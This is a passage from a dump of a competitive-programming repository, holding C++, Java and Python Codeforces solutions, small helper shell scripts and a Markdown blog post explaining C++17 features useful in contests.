ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.375, "alphanum_fraction": 0.4749999940395355, "avg_line_length": 39, "blob_id": "0da260cc15b8d5586c24efbae0aaaac0f90debec", "content_id": "8f327fc88239e0eb6fd577b182e8809c2d6fd799", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 40, "license_type": "no_license", "max_line_length": 39, "num_lines": 1, "path": "/scripts/measure.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "echo \"$(time ( $1 ) 2>&1 1>/dev/null )\"\n" }, { "alpha_fraction": 0.5723005533218384, "alphanum_fraction": 0.6018732786178589, "avg_line_length": 21.786571502685547, "blob_id": "7aa99d7ac621154c19ee34e302bfba11b377f2cf", "content_id": "b8a455e5ce019f34bc28b2623b0ad74a25141c48", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9502, "license_type": "no_license", "max_line_length": 257, "num_lines": 417, "path": "/CodeForce/cpp17tricks/cpp17.md", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "C++17 is now [available](http://codeforces.com/blog/entry/57646) on codeforces, community [wants](http://codeforces.com/blog/entry/15643?#comment-413401) new edition of [C++ tricks](http://codeforces.com/blog/entry/15643) by [user:Swift], so, let's start! \nDisclaimer: I have done only few examples of new features, which in my opinion are related to competitive programming. Feel free to comment and provide more real-world examples or ask to elaborate some features with more examples or explanations.\n\n### Fold expressions\n\n* I think that everybody knows, what reduce or fold means, but a c++11 example:\n\n```\nvector<int> v = {1, 3, 5, 7};\nint res = accumulate(v.begin(), v.end(), 0, [](int a, int b) { return a + b; });\ncout << res; // 16\n```\n\n* In C++17 there is also folding support for a template parameters list. It has the following syntax:\n\n```\n(pack op ...)\n(... op pack)\n(pack op ... op init)\n(init op ... op pack)\n```\n\n* For example, implement a template function that takes a variable number of parameters and calculates their sum. \n\n[cut]\n\nBefore C++17 we cannot do this without explicit first argument:\n\n```\n//C++14\nauto Sum()\n{\n return 0;\n}\n\ntemplate<typename Arg, typename... Args>\nauto Sum(Arg first, Args... rest)\n{\n return first + Sum(rest...);\n}\n\ncout << Sum(1, 2, 3, 4, 5); // 15\n```\n\n```\n//C++17\ntemplate<typename... Args>\nauto Func(Args... args)\n{\n return (args + ...);\n}\n\ncout << Func(1, 2, 3, 4, 5); // 15\n```\n\n* This is useful, when we use comma as `op`:\n\n```\n// C++17\ntemplate<typename T, typename... Args>\nvoid pushToVector(vector<T>& v, Args&&... args)\n{\n (v.push_back(forward<Args>(args)), ...);\n //This code is expanded into a sequence of expressions separated by commas as follows:\n // v.push_back(forward<Args_1>(arg1)),\n // v.push_back(forward<Args_2>(arg2)),\n // ....\n}\n\nvector<int> v;\npushToVector(v, 1, 4, 5, 8);\n```\n\n* And my favourite example:\n\n```\n//C++17\ntemplate<typename... Args>\nvoid readln(Args&... args)\n{\n ((cin >> args), ...);\n}\n\ntemplate<typename... Args>\nvoid writeln(Args... args)\n{\n ((cout << args << \" \"), ...);\n}\n\nint x;\ndouble y;\nreadln(x, y); // enter 100 500.1234\nwriteln(x, \"some string\", y); // 100 some string 500.1234\n```\n\n* **Note**: brackets are meaningfull\n\n### Class template argument deduction\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\n//C++11\npair<int, double> p1 = {14, 17.0}\npoint<int> u = {1, 2};\n\n//C++17\npair p2 = {14, 17.0}\npoint v = {1, 2};\n```\n\nIf struct is complex, there is a possibility to write deduction guides ourselves, for instance:\n\n```\ntemplate<typename T, typename U>\nstruct S\n{\n T first;\n U second;\n};\n\n// My deduction guide\ntemplate<typename T, typename U>\nS(const T &first, const U &second) -> S<T, U>;\n\n```\n**Note**: the compiler is able to create deduction guide automatically from a constructor, but in this example, the structure S has no constructor, so, we define deduction guide manually.\n\n### `*this` capture in lambda expressions\n\nI don't think this is useful in CP, but who knows:\n\n```\nstruct someClass\n{\n int x = 0;\n\n void f() const\n {\n cout << x << '\\n';\n }\n\n void g()\n {\n x++;\n }\n\n // C++14\n void func()\n {\n auto lambda1 = [self = *this]() { self.f(); };\n auto lambda2 = [self = *this]() mutable { self.g(); };\n lambda1();\n lambda2();\n }\n\n // C++17\n void funcNew()\n {\n auto lambda1 = [*this]() { f(); };\n auto lambda2 = [*this]() mutable { g(); };\n lambda1();\n lambda2();\n }\n};\n\n```\n[Article](https://arne-mertz.de/2017/10/mutable/) about `mutable` keyword.\n\n### Structured bindings\n\n* The most useful syntax sugar for decomposition of objects.\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\nvector<point<int>> points = {{0, 0}, {1, 0}, {1, 1}, {1, 0}};\n//C++11\nfor (auto& point : points)\n{\n int x, y;\n tie(x, y) = point;\n //...Some compex logic with x and y\n}\n\n//C++17\nfor (auto& [x, y] : points)\n{\n //...Some compex logic with x and y\n}\n```\n\n* Iterating over map:\n\n```\nmap<int, string> m;\nfor (auto [key, value] : m)\n cout << \"key: \" << key << '\\n' << \"value: \" << value << '\\n';\n```\n\n* A good example of usage is problem [problem:938D]. Code with structured bindings (Dijkstra algo) is much more readable and understandable: compare [submission:35474147] and [submission:35346635].\n\n```\nwhile (!q.empty())\n{\n auto [dist, u] = *q.begin();\n q.erase(q.begin());\n used[u] = true;\n for (auto& [w, v] : g[u])\n if (!used[v] && d[v] > dist + 2 * w)\n q.erase({d[v], v}),\n d[v] = dist + 2 * w,\n q.insert({d[v], v});\n}\n```\n\n### Initializer in `if` and `switch`\n\n```\nset<int> s;\n\nif (auto [iter, ok] = s.insert(42); ok)\n{\n //...\n}\nelse\n{\n //`ok` and `iter` are available here\n}\n//But not here\n```\n\n### New attributes\n\n* `[[fallthrough]]` attribute indicates that the break operator inside a case block is missing intentionally:\n\n```\nint requests, type;\ncin >> requests;\nfor (int q = 0; q < requests; ++q)\n switch (cin >> type; type) //Initializer in switch\n {\n case 1:\n int l, r;\n cin >> l >> r;\n //proceed request of first type\n break;\n case 2:\n [[fallthrough]];\n //Compiler warning will be supressed\n case 3:\n int value;\n cin >> value;\n //Proceed requests of second and third types.\n }\n```\n\n* `[[nodiscard]]` attribute is used to indicate that the return value of the function should not be ignored and can be also applied to data types.\n\n### std::optional\n\n```\noptional<int> findPath(graph g, int from, int to)\n{\n //Find path from `from` to `to`\n if (d[to] != INF)\n return d[to];\n return {}\n}\n\n//We can check if value exists\nif (auto dist = findPath(...); dist.hasValue())\n cout << dist.value(); //And get it\nelse\n cout << -1;\n\n//Or use defaultValue if value is not set\ncout << findPath(...).value_or(-1); //Prints distance if path exists and -1 otherwise\n```\n\n### Non-constant string::data\n\nFor C-lovers:\n\n```\nstring str = \"hello\";\nchar *p = str.data();\np[0] = 'H';\ncout << str; // Hello\n```\n\n### Free functions std::size, std::data and std::empty\n\nIn addition to the already existing free functions std::begin, std::end and others, some new free functions appeared, such as: std::size, std::data and std::empty:\n\n```\nvector<int> v = { 3, 2, 5, 1, 7, 6 };\n\nsize_t sz = size(v);\nbool empty = empty(v);\nauto ptr = data(v);\n```\n\n### std::clamp\n\nReturns `x` if it is in the interval `[low, high]` or, otherwise, the nearest value:\n\n```\ncout << clamp(7, 0, 10); //7\ncout << clamp(7, 0, 5); //5\ncout << clamp(7, 10, 50); //10\n```\n\nI think that it is convenient function, but it'll be difficult to call it in mind during contest :)\n\n### GCD and LCM!\n\n```\ncout << gcd(24, 60); // 12\ncout << lcm(8, 10); // 40\n```\n\n### The return value from `emplace_back`\n\n```\nvector<int> v = { 1, 2, 3 };\n\nauto &r = v.emplace_back(10);\nr = 42;\n//v now contains {1, 2, 3, 42}\n```\n\n### std::map functions:\n\n* Extract (and even change key!!!)\n\n```\nmap<int, string> myMap{ { 1, \"Gennady\" }, { 2, \"Petr\" }, { 3, \"Makoto\" } };\nauto node = myMap.extract(2);\nnode.key() = 42;\nmyMap.insert(move(node));\n\n// myMap: {{1, \"Gennady\"}, {42, \"Petr\"}, {3, \"Makoto\"}};\n```\n\n**Note**: Extract is the only way to change a key of a map element without reallocation\n\nComplexity: \nextract(key): $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/extract) \nextract(iterator): $O(1)$ amortized [doc](http://en.cppreference.com/w/cpp/container/map/extract)\n\n* Merge\n\n```\nmap<int, string> m1{ { 1, \"aa\" }, { 2, \"bb\" }, { 3, \"cc\" } }; \nmap<int, string> m2{ { 4, \"dd\" }, { 5, \"ee\" }, { 6, \"ff\" } };\nm1.merge(m2);\n// m1: { {1, \"aa\"}, {2, \"bb\"}, {3, \"cc\"}, {4, \"dd\"}, {5, \"ee\"}, {6, \"ff\"} }\n// m2: {}\n```\n\nCompexity: $O(N \\log(N + M))$ [doc](http://en.cppreference.com/w/cpp/container/map/merge)\n\n* To figure out if the insert or update occurred, we had to first look for the element, and then apply the operator[]. Now we had insert_or_assign:\n\n```\nmap<int, string> m;\nm.emplace(1, \"aaa\");\nm.emplace(2, \"bbb\");\nm.emplace(3, \"ccc\");\n\nauto [it1, inserted1] = m.insert_or_assign(3, \"ddd\");\ncout << inserted1; // 0\n\nauto [it2, inserted2] = m.insert_or_assign(4, \"eee\");\ncout << inserted2; // 1\n```\n\nComplexity: $O(\\log(N))$ [doc](http://en.cppreference.com/w/cpp/container/map/emplace)\n\n### More rigorous evaluation order of expressions\n\nAnd in general c++17 introduces new rules, defining more strictly the evaluation order of expressions:\n\n* Postfix expressions are evaluated from left to right (including function calls and access to objects members)\n* Assignment expressions are evaluated from right to left.\n* Operands of operators << and >> are evaluated from left to right.\n\nThus, as it is mentioned in the proposal for the standard, in the following expressions a is now guaranteed to be evaluated first, then b, then c:\n\n```\na.b\na->b\na->*b\na(b1, b2, b3)\nb @= a\na[b]\na << b << c\na >> b >> c\n```\n\n**Note**: the evaluation order between b1, b2, b3 is still not defined.\n\nP.S.: All materials are adopted with my examples from [here](https://www.viva64.com/en/b/0533) \nP.P.S.: I don't think my english is [poor](http://codeforces.com/blog/entry/57479?#comment-411601), but please PM me about grammar or other mistakes to make this article better!\n" }, { "alpha_fraction": 0.40689656138420105, "alphanum_fraction": 0.4689655303955078, "avg_line_length": 17.125, "blob_id": "e0ff8014bd6f6c92f701b6d2b431cedb7ed3c226", "content_id": "9aa4a186160e2683e0174661c0e12edd815b698a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 45, "num_lines": 8, "path": "/CodeForce/0738/gen.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = 2 * 10 ** 1 - 1\nk = n\ns = n + 1\nt = n\nprint(n, k, s, t)\nfor i in range(n):\n print(i + 1, 1)\nprint(\" \".join(str(i + 1) for i in range(k)))\n" }, { "alpha_fraction": 0.4297795295715332, "alphanum_fraction": 0.44004833698272705, "avg_line_length": 24.274808883666992, "blob_id": "9baa4d2675dce0aa06ca5c71ecc277fed11582e6", "content_id": "a9daf2802a93d0a8ad38695e4a416b6ddb3d2e68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3311, "license_type": "no_license", "max_line_length": 928, "num_lines": 131, "path": "/CodeForce/0292/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &a, int n)\n{\n int x;\n a.push_back(0);\n for (int i = 1; i <= n; i++)\n {\n read(x);\n a.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nstruct node\n{\n vector<node*> v;\n int count;\n int l;\n int f;\n node(int l, int count, int f)\n {\n this->count = count;\n this->l = l;\n this->f = f;\n }\n};\n\nnode *root;\nnode *k;\n\nint get(int s, int temp)\n{\n while (true)\n {\n int i = 0;\n while (s > temp)\n {\n temp += k->v[i]->count;\n i++;\n }\n if (k->f)\n break;\n i--;\n temp -= k->count;\n k = k->v[i];\n }\n return k->f == 1 ? a[s - temp + k->l] : b[s - temp + k->l];\n}\n\nvoid inser(int s, int where, int much)\n{\n int temp = 0;\n while (true)\n {\n int i = 0;\n k->count += much;\n while (s > temp)\n {\n temp += k->v[i]->count;\n i++;\n }\n if (k->f)\n break;\n i--;\n temp -= k->count;\n k = k->v[i];\n }\n node *t = new node(k->l, temp - s + 1, k->f);\n k->v.push_back(t);\n t = new node(where, much, 2);\n k->v.push_back(t);\n t = new node(temp - s + k->l + 2, k->count - temp + s - 1 - much, k->f);\n k->v.push_back(t);\n k->f = 0;\n }\n\nvoid writeln(node* k)\n{\n writeln(k->l, k->count, k->f);\n for (int i = 0; i < k->v.size(); i++)\n writeln(k->v[i]);\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n//freopen(\"output.txt\", \"w+\", stdout);\n int n, m, x, y, z, s;\n readln(n, m);\n readln(b, n);\n readln(a, n);\n node *t = new node(0, n, 1);\n root = new node(0, 0, 0);\n root->v.push_back(t);\n for (int qq = 0; qq < m; qq++)\n {\n writeln(root);\n read(s);\n k = root;\n if (s == 2)\n {\n cout << \"ck\\n\";\n readln(x);\n writeln(get(x, 0));\n } else\n {\n cout << \"ins\\n\";\n readln(x, y, z);\n inser(x, y - 1, z);\n }\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5281925797462463, "alphanum_fraction": 0.543570339679718, "avg_line_length": 31.280574798583984, "blob_id": "5928c76a3591f19c6f3831adbf31bdfa61aacc7d", "content_id": "a5405eb644a65c5c81e88d6d554befc4baadc506", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4487, "license_type": "no_license", "max_line_length": 174, "num_lines": 139, "path": "/CodeForce/0200/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nstruct team\n{\n int scored = 0;\n int losed = 0;\n int points = 0;\n string name;\n team() {}\n team(string name) : name(name) {}\n\n bool operator<(const team& other) const {\n return tuple(-points, losed - scored, -scored, name) < tuple(-other.points, other.losed - other.scored, -other.scored, other.name);\n }\n\n friend ostream& operator<<(ostream& os, const team& t) {\n return os << t.name << \" \" << t.points << \" \" << t.scored << \" \" << t.losed;\n };\n};\n\nvoid run()\n{\n vector<team> teams;\n map<string, int> indices;\n set<string> names, other;\n string berland = \"BERLAND\";\n\n auto addTeam = [&](const string& name) {\n names.insert(name);\n if (indices.find(name) == indices.end())\n indices[name] = teams.size(),\n teams.emplace_back(name);\n };\n\n auto addMatch = [&](team& first, team& second, int a, int b) {\n first.scored += a;\n first.losed += b;\n second.scored += b;\n second.losed += a;\n if (a == b)\n first.points++,\n second.points++;\n else if (a < b)\n second.points += 3;\n else\n first.points += 3;\n };\n fori(5)\n {\n string f, s;\n char c;\n int a, b;\n readln(f, s, a, c, b);\n addTeam(f);\n addTeam(s);\n team& first = teams[indices[f]];\n team& second = teams[indices[s]];\n addMatch(first, second, a, b);\n if (f == berland)\n other.insert(s);\n if (s == berland)\n other.insert(f);\n }\n names.erase(berland);\n for (auto& x: other) names.erase(x);\n int i = indices[berland];\n int j = indices[*names.begin()];\n pii score;\n int mx = INTMAX;\n for (int x = 1; x < 100; x++)\n for (int y = 0; y < x; y++)\n {\n auto current = teams;\n addMatch(current[i], current[j], x, y);\n sort(all(current));\n if (current[0].name == berland || current[1].name == berland)\n if (x - y < mx)\n mx = x - y,\n score = {x, y};\n }\n if (mx == INTMAX)\n writeln(\"IMPOSSIBLE\");\n else\n cout << score.first << \":\" << score.second << \"\\n\";\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.517241358757019, "alphanum_fraction": 0.5632184147834778, "avg_line_length": 16.399999618530273, "blob_id": "379a2f0691ecbaa931879350c816a08522132fbd", "content_id": "e275c446489d42901fde3d502d6552a267f1b5a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 87, "license_type": "no_license", "max_line_length": 33, "num_lines": 5, "path": "/CodeForce/1275/run.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "for i in {1..100}\ndo\n ./F < input > output &\n ./interactor > input < output\ndone\n" }, { "alpha_fraction": 0.32588356733322144, "alphanum_fraction": 0.33316007256507874, "avg_line_length": 22.673076629638672, "blob_id": "0aeb8439fe4151bf3b1f148a34e7ca0fe31fb5e0", "content_id": "80d5ef32ae6f20942d79080dcb97ab92131b8827", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5242, "license_type": "no_license", "max_line_length": 82, "num_lines": 156, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/K.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.util.*;\r\nimport java.io.*;\r\nimport static java.lang.Math.*;\r\n \r\npublic class K {\r\n    FastScanner in;\r\n    PrintWriter out;\r\n \r\n    final String inputName = null;\r\n    final String outputName = null;\r\n \r\n    public void solve() {\r\n        int n = in.nextInt();\r\n \r\n        int[] a = new int[n];\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            a[i] = in.nextInt();\r\n        }\r\n \r\n        int k = 30;\r\n        long[] c = new long[k];\r\n \r\n        for (int i = 0; i < k; i++) {\r\n            c[i] = in.nextLong();\r\n        }\r\n        int m = 1 << n;\r\n \r\n        long[][] w = new long[n][n];\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            for (int j = 0; j < n; j++) {\r\n                int d = a[i] ^ a[j];\r\n \r\n                for (int b = 0; b < k; b++) {\r\n                    if (((1 << b) & d) > 0) {\r\n                        w[i][j] += c[b];\r\n                    }\r\n                }\r\n            }\r\n        }\r\n \r\n        long[][] dp = new long[n][m];\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            for (int mask = 1; mask < m; mask++) {\r\n                dp[i][mask] = Integer.MAX_VALUE;\r\n            }\r\n        }\r\n \r\n        for (int i = 0; i < n; i++) {\r\n            int mask = 1 << i;\r\n \r\n            long cur = 0;\r\n            for (int b = 0; b < k; b++) {\r\n                if (((1 << b) & a[i]) > 0) {\r\n                    cur += c[b];\r\n                }\r\n            }\r\n \r\n            dp[i][mask] = cur;\r\n \r\n        }\r\n \r\n        for (int mask = 1; mask < m; mask++) {\r\n            for (int i = 0; i < n; i++) {\r\n                if (((1 << i) & mask) > 0) {\r\n \r\n                    int free = mask ^ (1 << i);\r\n \r\n                    for (int j = 0; j < n; j++) {\r\n                        if (((1 << j) & free) > 0) {\r\n                            dp[i][mask] = min(dp[i][mask], dp[j][free] + w[i][j]);\r\n                        }\r\n                    }\r\n                }\r\n            }\r\n        }\r\n \r\n        long ans = Integer.MAX_VALUE;\r\n        for (int i = 0; i < n; i++) {\r\n            ans = min(ans, dp[i][m - 1]);\r\n        }\r\n \r\n        out.println(ans);\r\n \r\n    }\r\n \r\n    public void run() {\r\n        try {\r\n \r\n            if (inputName == null) {\r\n                in = new FastScanner(null);\r\n            } else {\r\n                in = new FastScanner(new File(inputName));\r\n            }\r\n \r\n            if (outputName == null) {\r\n                out = new PrintWriter(System.out);\r\n            } else {\r\n                out = new PrintWriter(new File(outputName));\r\n \r\n            }\r\n \r\n            solve();\r\n            in.close();\r\n            out.close();\r\n        } catch (IOException e) {\r\n            e.printStackTrace();\r\n        }\r\n    }\r\n \r\n    class FastScanner {\r\n        BufferedReader br;\r\n        StringTokenizer st;\r\n \r\n        void close() throws IOException {\r\n            br.close();\r\n        }\r\n \r\n        FastScanner(File f) {\r\n            try {\r\n                if (f == null) {\r\n                    br = new BufferedReader(new InputStreamReader(System.in));\r\n                } else {\r\n                    br = new BufferedReader(new FileReader(f));\r\n                }\r\n            } catch (FileNotFoundException e) {\r\n                e.printStackTrace();\r\n            }\r\n        }\r\n \r\n        long nextLong() {\r\n            return Long.parseLong(next());\r\n        }\r\n \r\n        String next() {\r\n            while (st == null || !st.hasMoreTokens()) {\r\n                try {\r\n                    st = new StringTokenizer(br.readLine());\r\n                } catch (IOException e) {\r\n                    e.printStackTrace();\r\n                }\r\n            }\r\n            return st.nextToken();\r\n        }\r\n \r\n        int nextInt() {\r\n            return Integer.parseInt(next());\r\n        }\r\n    }\r\n \r\n    public static void main(String[] arg) {\r\n        new K().run();\r\n    }\r\n}\n" }, { "alpha_fraction": 0.4491384029388428, "alphanum_fraction": 0.4660922586917877, "avg_line_length": 35.71428680419922, "blob_id": "80525dfd1f4c307ed1054a30e8da8b0c7991b7bb", "content_id": "95ec45dbd549b3d0b2d020b6cd80a73f583f2d1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3598, "license_type": "no_license", "max_line_length": 928, "num_lines": 98, "path": "/CodeForce/0389/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <queue>\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\nvoid readln(vector<int> &f, int n){int x;for (int i = 1; i <= n; i++){read(x);f.push_back(x);}}void writeln(vector<int> &f){for (int i = 0; i < f.size(); i++)printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');}\n\nint g[1001][1001];\nvoid addedge(int i, int j, int v = 1)\n{\n g[i][j] = v;\n g[j][i] = v;\n}\n\nvoid run()\n{\n int k;\n readln(k);\n if (k == 1)\n {\n printf(\"2\\nNY\\nYN\\n\");\n return;\n }\n if (k == 3)\n {\n printf(\"5\\nNNYYY\\nNNYYY\\nYYNNN\\nYYNNN\\nYYNNN\\n\");\n return;\n }\n vi ans;\n int mx = 0;\n fori(30)\n if (1 << i & k)\n ans.pb(i),\n mx = i;\n int count = 2, last = 0, thelast;\n for (int j = ans.size() - 1; j >= 0; j--)\n {\n addedge(0, count);\n addedge(0, count + 1);\n for (int i = 0, f = 0; i < mx && !f; i++)\n for (int t = 0; t < 2; t++, count++)\n if (i < ans[j] - 1)\n addedge(count, count + 2 - t),\n addedge(count, count + 3 - t),\n last = max(last, count + 2 - t);\n else\n if (j == ans.size() - 1)\n addedge(count, 1);\n else\n if (i < ans[j + 1] - 2)\n {\n if (i == 0)\n last = max(last, count + 2);\n addedge(count, count + 2);\n }\n else\n addedge(count, thelast, j || !t || !(k % 2)),\n f = 1;\n thelast = last;\n }\n writeln(count);\n fori(count)\n {\n forj(count)\n printf(\"%c\", g[i][j] ? 'Y' : 'N');\n enter;\n }\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.45916515588760376, "alphanum_fraction": 0.47549909353256226, "avg_line_length": 22.913043975830078, "blob_id": "915a586bed894ba3cb46f8a40f0f3d5ed5ddc1a2", "content_id": "472b0cfa671f8301add530087d51df0aa5170ae4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 599, "license_type": "no_license", "max_line_length": 61, "num_lines": 23, "path": "/2023/tin/5.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\n\n\ndef get_answer_mask(text: str) -> list[int]:\n got, ans = text.split(', ')\n ret = [0] * 5\n s = set()\n for i in range(5):\n if got[i] == ans[i]:\n ret[i] = 1\n s.add(got[i])\n elif got[i] in ans and not got[i] in s:\n ret[i] = 0\n s.add(got[i])\n else:\n ret[i] = -1\n return ret\n\n\nif __name__ == \"__main__\":\n input_str = input()\n # Необходимо преобразовать список в строку перед выводом.\n print(', '.join(map(str, get_answer_mask(input_str))))\n" }, { 